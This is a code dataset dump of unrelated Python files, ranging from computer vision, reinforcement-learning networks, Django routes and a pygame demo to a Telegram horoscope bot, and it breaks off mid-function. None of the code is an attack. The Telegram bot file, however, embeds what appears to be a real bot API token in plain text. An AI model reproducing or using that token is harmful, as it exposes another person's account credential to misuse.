plt\n\nclass VideoCapture:\n def __init__(self):\n #vc = cv2.CascadeClassifier(\"./haar/coches.xml\")\n vc = cv2.CascadeClassifier(\".\\\\haar\\\\coches.xml\")\n #ruta = \"./Videos/video2.wmv\"\n ruta = \".\\\\Videos\\\\video2.wmv\"\n\n detector = cv2.VideoCapture(ruta)\n ret, frame = detector.read()\n while frame is not None:\n escalaGris = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n coches = vc.detectMultiScale(escalaGris,1.1,10,flags=cv2.cv.CV_HAAR_SCALE_IMAGE)\n for (x,y,w,h) in coches:\n cv2.rectangle(escalaGris,(x,y),(x+w,y+h),(0,225,0),2)\n cv2.imshow('Video',escalaGris)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n ret,frame = detector.read()\n detector.release()\n cv2.destroyAllWindows()","sub_path":"Practica3Definitiva/VideoCapture.py","file_name":"VideoCapture.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643895985","text":"# Copyright 2018 The TensorFlow Authors All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Sample actor(policy) and critic(q) networks to use with DDPG/NAF agents.\n\nThe DDPG networks are defined in \"Section 7: Experiment Details\" of\n\"Continuous control with deep reinforcement learning\" - Lilicrap et al.\nhttps://arxiv.org/abs/1509.02971\n\nThe NAF critic network is based on \"Section 4\" of \"Continuous deep Q-learning\nwith model-based acceleration\" - Gu et al. https://arxiv.org/pdf/1603.00748.\n\"\"\"\n\nimport tensorflow as tf\nslim = tf.contrib.slim\nimport gin.tf\n\n\n@gin.configurable('sac_actor_net')\ndef actor_net(states, action_spec,\n hidden_layers=(400, 300),\n normalizer_fn=None,\n activation_fn=tf.nn.relu,\n zero_obs=False,\n images=False):\n \"\"\"Creates an actor that returns actions for the given states.\n\n Args:\n states: (castable to tf.float32) a [batch_size, num_state_dims] tensor\n representing a batch of states.\n action_spec: (BoundedTensorSpec) A tensor spec indicating the shape\n and range of actions.\n hidden_layers: tuple of hidden layers units.\n normalizer_fn: Normalizer function, i.e. slim.layer_norm,\n activation_fn: Activation function, i.e. tf.nn.relu, slim.leaky_relu, ...\n Returns:\n A tf.float32 [batch_size, num_action_dims] tensor of actions.\n \"\"\"\n\n with slim.arg_scope(\n [slim.fully_connected],\n activation_fn=activation_fn,\n normalizer_fn=normalizer_fn,\n weights_initializer=slim.variance_scaling_initializer(\n factor=1.0/3.0, mode='FAN_IN', uniform=True)):\n\n states = tf.to_float(states)\n orig_states = states\n if images or zero_obs: # Zero-out x, y position. Hacky.\n states *= tf.constant([0.0] * 2 + [1.0] * (states.shape[1] - 2))\n if hidden_layers:\n states = slim.stack(states, slim.fully_connected, hidden_layers,\n scope='states')\n with slim.arg_scope([slim.fully_connected],\n weights_initializer=tf.random_uniform_initializer(\n minval=-0.003, maxval=0.003)):\n actions = slim.fully_connected(states,\n 2 * action_spec.shape.num_elements(),\n scope='actions',\n normalizer_fn=None,\n activation_fn=None)\n\n means, log_vars = tf.split(actions, 2, axis=(-1))\n action_means = (action_spec.maximum + action_spec.minimum) / 2.0\n action_magnitudes = (action_spec.maximum - action_spec.minimum) / 2.0\n means = action_means + action_magnitudes * tf.nn.tanh(means)\n\n log_vars = 6 * tf.nn.tanh(log_vars) - 3.0 # between -9 and +3\n\n return tf.concat([means, log_vars], (-1))\n","sub_path":"agents/sac_networks.py","file_name":"sac_networks.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"411663212","text":"import uuid\n\nfrom source.query.merger.task import MergerTasksGenerator\nfrom source.query.scores_service.domain import MergerKey\nfrom source.storage.stores.artifact_store.interface import ArtifactStoreInterface\nfrom source.storage.stores.artifact_store.types.quest.evaluation import OriginIndexJobArtifact\nfrom source.storage.stores.results_store.interface import ResultsStoreInterface\nfrom source.task_runner.handler_interface import TaskHandlerInterface\nfrom source.task_runner.submitter_interface import TaskSubmitterInterface\nfrom source.task_runner.tasks.dispatch_mergers_task import DispatchMergersTask\n\n\nclass MergerDispatchExecutor(TaskHandlerInterface):\n def __init__(self, scores_merger_task_generator, task_submitter, artifact_store, quest_general_store):\n \"\"\"\n @type scores_merger_task_generator: L{MergerTasksGenerator}\n @type task_submitter: L{TaskSubmitterInterface}\n @type artifact_store: L{ArtifactStoreInterface}\n @type quest_general_store: L{GeneralQuestDataStoreInterface}\n \"\"\"\n self.__artifact_store = artifact_store\n self.__task_submitter = task_submitter\n self.__scores_merger_task_generator = scores_merger_task_generator\n self.__quest_general_store = quest_general_store\n\n def handle_task(self, dispatch_task):\n \"\"\"\n @type dispatch_task: C{DispatchMergersTask}\n \"\"\"\n if dispatch_task.jobnik_session is None:\n job_id = uuid.uuid4().get_hex()\n else:\n job_id = dispatch_task.jobnik_session.job_token['jobId']\n\n generated_tasks = self.__scores_merger_task_generator.get_tasks(job_id, dispatch_task.customer,\n dispatch_task.quest_id,\n dispatch_task.query_id, dispatch_task.ml_conf,\n dispatch_task.merger_conf,\n dispatch_task.is_past,\n dispatch_task.jobnik_session,\n dispatch_task.query_execution_unit.seed,\n dispatch_task.feature_flags)\n\n total_num_tasks = len(generated_tasks) + 1 # Add one task for us\n\n for generated_task in generated_tasks:\n generated_task.total_num_tasks = total_num_tasks\n\n # We need to specify how many tasks remain for when our caller reports progress\n dispatch_task.total_num_tasks = total_num_tasks\n\n self.__task_submitter.submit_tasks(dispatch_task.job_id, 'merge_scores', generated_tasks)\n\n origin_index = self.__create_origin_index(generated_tasks)\n self.__quest_general_store.store_mergers_origin_index(dispatch_task.customer, dispatch_task.quest_id, dispatch_task.query_id, origin_index)\n self.__artifact_store.store_artifact(\n OriginIndexJobArtifact(dispatch_task.customer, dispatch_task.quest_id, dispatch_task.query_id, 'mergers', origin_index))\n\n @staticmethod\n def get_task_type():\n return DispatchMergersTask\n\n @staticmethod\n def __create_origin_index(tasks):\n \"\"\"\n @type tasks: C{list} of C{MergerTask}\n @rtype C{dict}\n \"\"\"\n origin_index = {}\n\n for task in tasks:\n task_config = task.task_config\n merger_key = MergerKey(task_config['merger_model'], task_config['variant'], task_config['scorer_id'])\n origin_id = ResultsStoreInterface.create_merger_origin_id(merger_key)\n origin_index[origin_id] = {\n 'scorer_id': task_config['scorer_id'],\n 'merger_model': task_config['merger_model'],\n 'variant': task_config['variant'],\n }\n\n return origin_index\n","sub_path":"internal/source/query/merger/dispatch/merger_dispatch_executor.py","file_name":"merger_dispatch_executor.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377388606","text":"\"\"\"kerala_relief URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom . import views\r\nfrom donate.views import Donate\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n # path('',views.IndexPage.as_view(),name='index'),\r\n path('',views.index,name='index'),\r\n\r\n path('accounts',include('accounts.urls',namespace='')),\r\n path('accounts', include('django.contrib.auth.urls')),\r\n path('test',views.TestPage.as_view(),name='test'),\r\n path('thanks',views.ThanksPage.as_view(),name='thanks'),\r\n path('donate', include('donate.urls')),\r\n path('medicalcare', include('medicalcare.urls',namespace='medical')),\r\n path('statistics',include('record.urls')),\r\n path('weather',include('weather.urls',namespace='weatherr')),\r\n path('complaint', include('complaint.urls',namespace='complaint')),\r\n\r\n]\r\nif settings.DEBUG:\r\n urlpatterns +=static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\r\n","sub_path":"src/kerala_relief/kerala_relief/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377151715","text":"import json\nimport ast\n\nrooms = open('rooms.txt', 'r+')\n# print(rooms.read())\n\nroom_directions = open('room_directions.txt', 'r+')\n# print(room_directions.read())\n\nterrain = open('terrain.txt', 'r+')\n\nroom_directions = json.load(room_directions)\nterrain = json.load(terrain)\n# rooms = json.load(rooms)\n\nnew_rooms = {}\ncounter = 0\n\n# for i in terrain:\n# x = terrain.get(f\"{i}\")\n\n# i = int(i)\n\n# print(i, x)\n# print(type(i))\n\n\nfor room in rooms:\n room = ast.literal_eval(room)\n\n for room_d in room_directions:\n room_d = int(room_d)\n print(room_d)\n print(type(room_d))\n print(type(room['room_id']))\n new_rooms = dict([(room_d, room['room_id'])])\n if room_d not in new_rooms and room_d == room['room_id']:\n new_rooms[room_d] = room['room_id']\n # , (room['room_id']) = ([room['terrain'], room_directions[room_d]])\n \n print('new_rooms length: ', len(new_rooms))\n\n# with open('terrain.txt', 'w') as f:\n# f.write(json.dumps(new_rooms, indent=4))\n","sub_path":"conversions.py","file_name":"conversions.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418375317","text":"import requests\n\n# 准备请求数据\nurl = 'http://test.lemonban.com/futureloan/mvc/api/member/register'\ndata = {\n 'mobilephone': '13133333334',\n 'pwd': '123456',\n 'regname': 'Jax'\n}\n# 发送请求 data参数接收传入参数\nresponse = requests.post(url=url, data=data)\n# 获取响应内容\nprint(response.text)\n# post请求独有获取响应内容:json(),只有返回内容为json格式才可接收\n# json()方法可以将返回的json格式字符串,转换为python对应的字典或列表格式\nprint(response.json())","sub_path":"study/study_requests/test_send_post.py","file_name":"test_send_post.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81914685","text":"import csv\nimport re\n\nwith open('faculty.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n degrees = []\n titles = []\n emails = []\n# Get degree, titles, emails\n for row in readCSV:\n degree = row[1]\n title = row[2]\n email = row[3]\n\n degrees.append(degree)\n titles.append(title)\n emails.append(email)\n# find number of degrees and frequency\n for i in range(0,len(degrees)):\n degrees[i] = degrees[i].lstrip(' ') # remove space at beginning\n degrees[i] = re.sub('[0\\.]', '', degrees[i]) # remove periods & '0'\n degrees[i] = re.split(' ', degrees[i])\n\n degrees = sum(degrees, []) # flattens the nested lists\n\n from collections import Counter\n print(Counter(degrees)) # Q1 gives frequency of each degree\n\n print(Counter(titles)) # Q2 gives frequency of each titles\n\n emailList = emails[1:len(emails)] # gets rid of header\n print(emailList) # Q3 prints list of emails\n\n for i in range(0,len(emails)):\n emails[i] = re.sub('.*[\\@]', '', emails[i]) # remove everything before '@'\n\n domains = list(set(emails[1:len(emails)])) # use set to remove duplicates\n\n print(domains) # Q4, list of domains\n\n\n","sub_path":"python/advanced_python_regex.py","file_name":"advanced_python_regex.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9527353","text":"import sys\nimport pygame\n\n\ndef sprite_loader(sprite_width, sprite_height, sheet_file):\n sprite_frames = []\n\n image = pygame.image.load(sheet_file).convert_alpha()\n width, height = image.get_size()\n\n for r in range(int(height / sprite_height)):\n for c in range(int(width / sprite_width)):\n sprite_frames.append(image.subsurface((c * sprite_width, r * sprite_height, sprite_width, sprite_height)))\n\n return sprite_frames\n\npygame.init()\n\nFRAMES_PER_SECOND = 60\nWIZARD_SPEED = 10\n\nscreen = pygame.display.set_mode((640, 400))\npygame.display.set_caption('The Wizard is Waving')\n\nframes = sprite_loader(50, 72, 'duke_spritesheet.png')\nnumber_of_sprites = len(frames)\ntimer = pygame.time.Clock()\n\n# We are now going to have a red rectangle move across the screen at a constant speed.\n# By varying the frame rate it is possible to compare the Dukes movements with the speed\n# of the rectangle. The desired result should be that the waving should not change that\n# much but the speed of the rect will.\nrect_x_position = 0\nframe_counter = 0\ncurrent_frame = 0\n\nrunning = True\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT :\n running = False\n sys.exit()\n\n screen.fill((200, 200, 200))\n screen.blit(frames[int(current_frame)], (100, 100))\n\n # A little fix should the FPS go below 10.\n frame_control = FRAMES_PER_SECOND\n if frame_control < 10:\n frame_control = 10\n\n # The Duke now waves all the time\n frame_counter = (frame_counter + 1) % frame_control\n current_frame = frame_counter // (frame_control / WIZARD_SPEED)\n\n # the rect_x_position is increased by 2 every round.\n rect_x_position += 2\n\n # Since we are using this program to visually compare the movement of its\n # artifacats, we implement a \"wrap-around\" functionality for the rectangle.\n if rect_x_position >= 640:\n rect_x_position = -30\n # We draw the rectangle\n pygame.draw.rect(screen, (255, 0, 0), pygame.Rect(rect_x_position, 300, 30, 30))\n\n pygame.display.update()\n timer.tick(FRAMES_PER_SECOND)\n","sub_path":"Python/FORR2HF05CU/Lokaverkefni/Sýniverkefni/05_PyGame/spritesheet_6.py","file_name":"spritesheet_6.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133879848","text":"import numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndata_path = '../LogosClean/commonformat/ImageSets/data2.txt'\r\nclasses_path = '../LogosClean/classes.txt'\r\n\r\ndata = np.loadtxt(data_path, dtype=str, delimiter='|')\r\nclasses = np.loadtxt(classes_path, dtype=str, delimiter='|')\r\nclasses = np.array([c.replace(' ', '') for c in classes])\r\nclass_to_int = dict(zip(classes, range(len(classes))))\r\n\r\ny = []\r\nfor i in range(len(data)):\r\n classname = data[i].split('/')[0]\r\n y.append(int(class_to_int[classname]))\r\n\r\ncounts = dict(zip(np.arange(len(class_to_int)), np.array([y.count(x) for x in range(len(classes))])))\r\nvalid_keys = np.array([key for key in counts.keys() if counts[key] >= 10])\r\n\r\n\r\n\r\n# train_data, test_data, train_y, test_y = train_test_split(X, y, test_size=0.1, stratify=y)\r\n# print(test_data)","sub_path":"misc_utils/scripts/logos/split_train_test.py","file_name":"split_train_test.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"150885880","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nfrom PIL import ImageTk, Image, ImageDraw\nimport PIL\nimport numpy as np\nfrom os.path import basename\nimport glob\nimport sys\nsys.path.append('..')\n\nfrom utils.predict import predict\n\nclass DrawFrame():\n\tdef __init__(self, frame=None, main_window=None):\n\t\tself.frame = frame\n\t\tself.main_window = main_window\n\t\tself._xold = None\n\t\tself._yold = None\n\t\tself.canvas = None\n\t\tself.color = 'Black'\n\t\tself.thickness = 15\n\t\tself.tag = ['tag', '0']\n\n\t\tself.models = []\n\t\tself.image1 = PIL.Image.new('RGB', (400, 400), (255, 255, 255))\n\t\tself.draw = ImageDraw.Draw(self.image1)\n\n\t\tself._create_widgets()\n\n\tdef _create_widgets(self):\n\t\tttk.Label(self.frame, text=\"Select Model for Prediction:\").grid(row=0, column=0, columnspan=2, padx=5, pady=5, sticky='w')\n\n\t\tself.network_select = ttk.Combobox(self.frame, state=\"readonly\", values=self.models)\n\t\tself.scan_model_dir()\n\t\tself.network_select.grid(row=1, column=0, columnspan=2, padx=5, sticky='news')\n\n\t\tttk.Label(self.frame, text=\" \").grid(row=2, column=0, columnspan=2, sticky='w')\n\n\t\tself.canvas = tk.Canvas(self.frame, width=400, height=400, bg='white')\n\t\tself.canvas.grid(row=3, column=0, columnspan=2, padx=5, pady=0)\n\t\ttk.Button(self.frame, text='Clear', bg='brown', fg='white', activebackground='brown4', activeforeground='white', command=self._clear).grid(row=4, column=0, padx=5, sticky='news')\n\t\ttk.Button(self.frame, text='Predict', bg='brown', fg='white', activebackground='brown4', activeforeground='white', command=self._save).grid(row=4, column=1, padx=5, sticky='news')\n\t\tself.canvas.bind('', self._on_up)\n\t\tself.canvas.bind('', self._on_motion)\n\n\t\ttk.Label(self.frame, text=\"Predicted Letter:\").grid(row=5, column=0, columnspan=2, padx=5, pady=10, sticky='w')\n\t\tself.predictedlabel = tk.StringVar()\n\t\tself.predictedlabel.set(\"-\")\n\t\ttk.Label(self.frame, textvariable=self.predictedlabel, font=(None, 50)).grid(row=6, column=0, columnspan=2, sticky='w')\n\n\n\tdef _clear(self):\n\t\tself.canvas.delete('all')\n\t\tself.image1 = PIL.Image.new('RGB', (400, 400), (255, 255, 255))\n\t\tself.draw = ImageDraw.Draw(self.image1)\n\t\tself.tag = ['tag', '0']\n\n\tdef _on_up(self, event):\n\t\tself._xold = None\n\t\tself._yold = None\n\t\tself.tag = ['tag', str(int(self.tag[1])+1)]\n\n\tdef _on_motion(self, event):\n\t\ttag = ''.join(self.tag)\n\t\tx1, y1 = (event.x - self.thickness), (event.y - self.thickness)\n\t\tx2, y2 = (event.x + self.thickness), (event.y + self.thickness)\n\t\tevent.widget.create_oval(x1, y1, x2, y2, width=0, fill=self.color, tag=tag)\n\n\t\tif self._xold is not None and self._yold is not None:\n\t\t\tself.canvas.create_oval(x1, y1, x2, y2, width=0, fill=self.color, tag=tag)\n\t\t\tself.canvas.create_line(self._xold, self._yold, event.x, event.y, smooth=True, width=2*self.thickness, fill=self.color, tag=tag)\n\t\t\tself.draw.line([x1, y1, x2, y2],fill='black',width=self.thickness+5)\n\n\t\tself._xold = event.x\n\t\tself._yold = event.y\n\n\n\tdef _save(self):\n\t\tfilename = 'number.jpeg'\n\t\timage = self.image1.resize((28, 28)).convert('L')\n\t\timage = PIL.ImageOps.invert(image)\n\n\t\t# image.save(filename, 'JPEG')\n\t\timgarray = np.asarray(image.getdata()).reshape((28,28))\n\n\t\tself.predictedlabel.set(str(predict(self.main_window, imgarray, self.network_select.get())))\n\n\tdef scan_model_dir(self):\n\t\tself.models = [basename(x) for x in glob.glob('architecture/models/*.ckpt')]\n\t\tself.network_select.config(values=self.models)\n\t\tif len(self.models) != 0:\n\t\t\tself.network_select.current(0)\n\t\treturn\n","sub_path":"interface/draw_frame.py","file_name":"draw_frame.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546617427","text":"#!/usr/bin/env python\n# by TR\nfrom obspy.core import UTCDateTime as UTC\nfrom sito.data import IPOC\nfrom sito.noisexcorr import (prepare, get_correlations,\n plotXcorrs, noisexcorrf, stack, getFilters)\nfrom sito import util\nimport matplotlib.pyplot as plt\nfrom sito.stream import read\nfrom multiprocessing import Pool\nimport time\n\ndef main():\n stations = 'PB01 PB02 PB03 PB04 PB05 PB06 PB07 PB08 HMBCX MNMCX PATCX PSGCX'\n\n components = 'Z'\n # TOcopilla earthquake: 2007-11-14 15:14\n t1 = UTC('2006-07-01')\n t2 = UTC('2008-12-31')\n\n shift = 500\n correlations = get_correlations(stations, components)\n\n method = 'FINAL_filter0.005-10_1bit_Tocopilla'\n\n data = IPOC(xcorr_append='/' + method, use_local_LVC=False)\n data.setXLogger('_' + method)\n pool = Pool()\n prepare(data, stations.split(), t1, t2, component=components,\n filter=(0.005, 10, 2, True), downsample=20,\n whitening=False,\n normalize='1bit', param_norm=None,\n pool=pool)\n noisexcorrf(data, correlations, t1, t2, shift, pool=pool)\n pool.close()\n pool.join()\n stack(data, correlations, dt=10 * 24 * 3600, shift=5 * 24 * 3600)\n stack(data, correlations, dt= -1)\n\n filters = None\n #filters = getFilters((0.005, 0.01, 0.1, 1, 5, 10), zerophase=True, corners=2)\n# plotXcorrs(data, correlations, t1, t2, start=None, end=None, filters=filters, plot_overview=True, plot_years=False, use_dlognorm=False,\n# plot_stack=True, plot_psd=True, add_to_title='', downsample=None)\n plotXcorrs(data, correlations, t1=None, t2=None, start=None, end=None, filters=filters, plot_overview=True, plot_years=False, use_dlognorm=False,\n plot_stack=True, plot_psd=True, add_to_title='', downsample=None, stack=('10days', '5days'))\n\n\n# ms = read(data.x_day % ('PB03Z', '*') + '.QHD')\n# tr = ms.calculate('mean')\n# tr.plot()\n# ipshell()\n\n# util.checkDir(data.getPlotX(('', ''), t1))\n #for correlation in correlations:\n# stations = correlation[0][:-1], correlation[1][:-1]\n# dist = data.stations.dist(*stations)\n## if dist >= 120:\n## t = (dist // 100) * 50 + 50\n## else:\n## t = 70\n# t = 200\n# stream = data.readDayXcorr(correlation, t1, t2)\n# if len(stream) > 0:\n# stream.plotXcorr(-t, t, imshow=True, vmax=0.01, vmin_rel='vmax',\n# fig=plt.figure(figsize=(8.267, 11.693)),\n# figtitle='station ' + method + ' around Tocopilla event',\n# dateformatter='%y-%m-%d', show=False,\n# save=data.getPlotX(correlation, 'Tocopilla_0.01.png'),\n# stack_lim=None)\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/noise/noise_s_final_Tocopilla.py","file_name":"noise_s_final_Tocopilla.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586424788","text":"import PyPDF2\n\nfile_name = 'C:\\\\Users\\\\vipin\\\\Desktop\\\\NotificationEvents_AutomationCust1_14-Feb-2018_14-Feb-2018.pdf'\nwith open(file_name, 'rb') as pdfFileObj:\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n print(pdfReader.numPages)\n count=0\n for count in range(pdfReader.numPages):\n pageObj = pdfReader.getPage(count)\n text = pageObj.extractText()\n print(text)\n if \"Voice Connections(Number)\" in text:\n print(\"Success\")","sub_path":"Module/testpdf.py","file_name":"testpdf.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602171500","text":"import telebot\nfrom random import choice\nimport random\nimport datetime\nfrom datetime import date\n\nAPI_TOKEN = '312164149:AAHGpHx3chsDOQ-dqWwqC_tW-fCf4ukQ6cA'\nbot = telebot.TeleBot(API_TOKEN)\n\nhoroscope = {}\n\ndef getTextFromHoroscope(sign):\n d = date.today()\n if (d, sign) not in horoscope:\n horoscope[(d, sign)] = gen_horoscope()\n\n return horoscope[(d, sign)]\n\ndef prepare_horoscope():\n with open('text.txt', encoding='utf-8') as f:\n global words\n words = []\n words = f.read().split()\n markov_chain = {}\n for i in range(0, len(words) - 2):\n key = (words[i], words[i+1])\n markov_chain.setdefault(key, [])\n markov_chain[key].append(words[i+2])\n return markov_chain\n\ndef gen_horoscope():\n stopsentence = (\".\", \"!\", \"?\",)\n markov_chain = prepare_horoscope()\n size = 25\n gen_words = []\n seed = random.randint(0, len(words) - 3)\n w1 = words[seed]\n while (w1.isupper() or w1.islower()):\n seed = random.randint(0, len(words) - 3)\n w1 = words[seed]\n w2 = words[seed+1]\n\n for i in range(0, size-1):\n gen_words.append(w1)\n try:\n w3 = choice(markov_chain[(w1,w2)])\n except KeyError:\n break\n w1, w2 = w2, w3\n\n while True:\n gen_words.append(w1)\n if w1[-1] in stopsentence:\n break\n try:\n w3 = choice(markov_chain[(w1,w2)])\n except KeyError:\n break\n w1, w2 = w2, w3\n result = ' '.join(gen_words)\n return result\n\n\ndef sign_period(ast_sign):\n periods = {'Овен': '20 марта — 19 апреля','Телец': '20 апреля — 20 мая', 'Близнецы':\n'21 мая — 20 июня','Рак':\n'21 июня — 22 июля', 'Лев':\n'23 июля — 22 августа', 'Дева':\n'23 августа — 22 сентября', 'Весы':\n'23 сентября — 22 октября', 'Скорпион':\n'23 октября — 21 ноября', 'Стрелец':\n'22 ноября — 21 декабря', 'Козерог':\n'22 декабря — 19 января', 'Водолей':\n'21 января — 18 февраля', 'Рыбы':\n'19 февраля — 19 марта'}\n\n\n get_period = periods[ast_sign]\n return get_period\nsign = [\"Овен\", \"Телец\", \"Близнецы\", \"Рак\", \"Лев\", \"Дева\",\"Весы\",\"Скорпион\", \"Стрелец\", \"Козерог\", \"Водолец\", \"Рыбы\"]\n\n# Handle '/start' and '/help'\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Привет! Тебя приветствует известный ученый психолог Форер! Он может предсказать твое будущее! Думаешь компьютеры плохие астрологи? Давай проверим! Хочешь? /Yes\")\n\n@bot.message_handler(commands=['No'])\ndef no_message(message):\n bot.send_message(message.chat.id, \"Жаль, жаль! Если передумаешь нажимай /Yes, твой Форер\")\n@bot.message_handler(commands=['Yes'])\ndef yes_message(message):\n bot.send_message(message.chat.id, \"Здорово, напиши нам свой знак зодиака \")\n\n@bot.message_handler(func=lambda message: True)\ndef guess_message(message):\n if message.text in sign:\n ast_sign = message.text\n h = getTextFromHoroscope(ast_sign)\n this_period = sign_period(ast_sign)\n bot.send_message(message.chat.id,\n \"Значит так, ты\" + \" \" + ast_sign + \"\" + \"(\" + this_period + \")\" + \".\" + \" \"+ \"Вот что говорят о тебе звезды:\" + \"\" + \"\" + h)\n\n\n else:\n if message.text == \"Нет\" or message.text == \"нет\" or message.text == \"в жопу\":\n bot.send_message(message.chat.id,\n \"Что ж ты так грубо то...Да бог с тобой! Лучше попробуй заново /start\")\n else:\n if message.text == \"спасибо\" or message.text == \"круто\" or message.text == \"класс\":\n bot.send_message(message.chat.id,\n \"Я рад, что тебе понравилось, заходи еще завтра, тебя будет ждать свеженький гороскоп:)\")\n else:\n bot.send_message(message.chat.id,\n \"Астролог Форер к вашим услугам, чтобы начать нажми /start\")\n\n\nbot.polling()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297801285","text":"#!/usr/bin/env python3\n\n\"\"\"\n File to test the hyperparameters on the DEFAULT simulation - see function parse_args for default settings.\n Reduced version of one-hot-sim.py\n Accepts the two following arrays (should be sampled from a Dirichlet):\n * Distribution over classes p(u)\n * Distribution over objects for classes p(t|u)\n Returns the total cross-entropy for:\n * Flat estimation\n * Predicted estimation\n * Hierarchical Prediction\n * Dynamic Hierarchical prediction\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n# Imports for file workings\nimport sys\nfrom argparse import ArgumentParser\nimport os.path\nimport errno\nimport h5py\n\ndef save_results(args, datadict, configs):\n \"\"\"\n Function to save the results.\n Requires: Output directory, arguments for case discriminiation\n dictionary, with the names being the keys and the values the data \n We should save:\n All results\n The filename represents the arguments of the simulation, with the tuple being splitable by:\n ParamName-Value_ParamName-Value_ etc.\n \"\"\"\n parentDir = os.path.dirname(__file__)\n outputdir = os.path.abspath(os.path.join(parentDir, 'tmp', 'results'))\n\n # Setting up the outputdirectory\n if args.transposed:\n transp = 1\n else:\n transp=0\n if args.random:\n rando = 1\n else:\n rando=0\n if args.testconfig:\n testconf = 1\n else:\n testconf=0\n \n # With this string formatting it can be split by _ and by -\n outname = \"Ptu-{}_Sim-{}_Dim-{}_Fov-{}_Acc-{}_HOver-{}_VOver-{}_Transp-{}_Rand-{}_Test-{}\".format(\n args.ptu, args.simcase, args.dim, args.fov, args.accuracy, 1-args.overlaph, 1-args.overlapv, transp, rando, testconf\n )\n outdir = os.path.abspath(os.path.join(outputdir, outname))\n try:\n os.mkdir(outdir)\n except OSError as exc:\n # if exc.errno != errno.EEXIST:\n raise\n # pass\n \n # Now write the files in that output directory\n # Use Syntax like:\n # for k,v in dictionary.items() - for all the different arrays that I have\n fname = os.path.join(outdir, outname+\".hdf5\")\n with h5py.File(fname, \"w\") as f:\n for k,v in datadict.items():\n dset=f.create_dataset(k, data=v)\n\n # Write the configs to an excel file. use PD.ExcelWriter here\n fname = os.path.abspath(os.path.join(outdir,\"configs\"+\".hdf5\"))\n with h5py.File(fname, \"w\") as f:\n for k,v in configs.items():\n dset = f.create_dataset(k, data=v.astype(np.float64))\n\n# Creating the map\ndef scenario1(xmax, ymax, classlist, transpose=False):\n \"\"\"\n Helper function to create the ground truth map, with the classlist indicies\n Indices:\n 0 - house\n 1 - pavement\n 2 - grass\n 3 - tree\n 4 - vehicle\n \"\"\"\n\n tree = np.asarray([0, 0, 0, 1, 0])\n vehicle = np.asarray([0, 0, 0, 0, 1])\n house = np.asarray([1, 0, 0, 0, 0])\n pavement = np.asarray([0, 1, 0, 0, 0])\n\n n = xmax\n m = ymax\n k = classlist.size\n gt = np.zeros((n,m,k))\n\n # Divide columns into 4 sections\n fourth = m//4\n\n # First: Everything is grass\n gt[...,2] = 1\n # second fourth is \"pavement\"\n gt[:,1*fourth+1:2*fourth,:] = pavement\n\n # in Fourth fourth, divide rows into 8 block\n eigth = n//8\n for i in range(eigth):\n if i%2==0:\n # Put houses into the even blocks\n r_idx = i*eigth\n gt[r_idx:r_idx+eigth,3*fourth:3*fourth+3,:] = house\n \n # In third block, put a few trees there\n x = np.asarray(range(0,n,5))\n 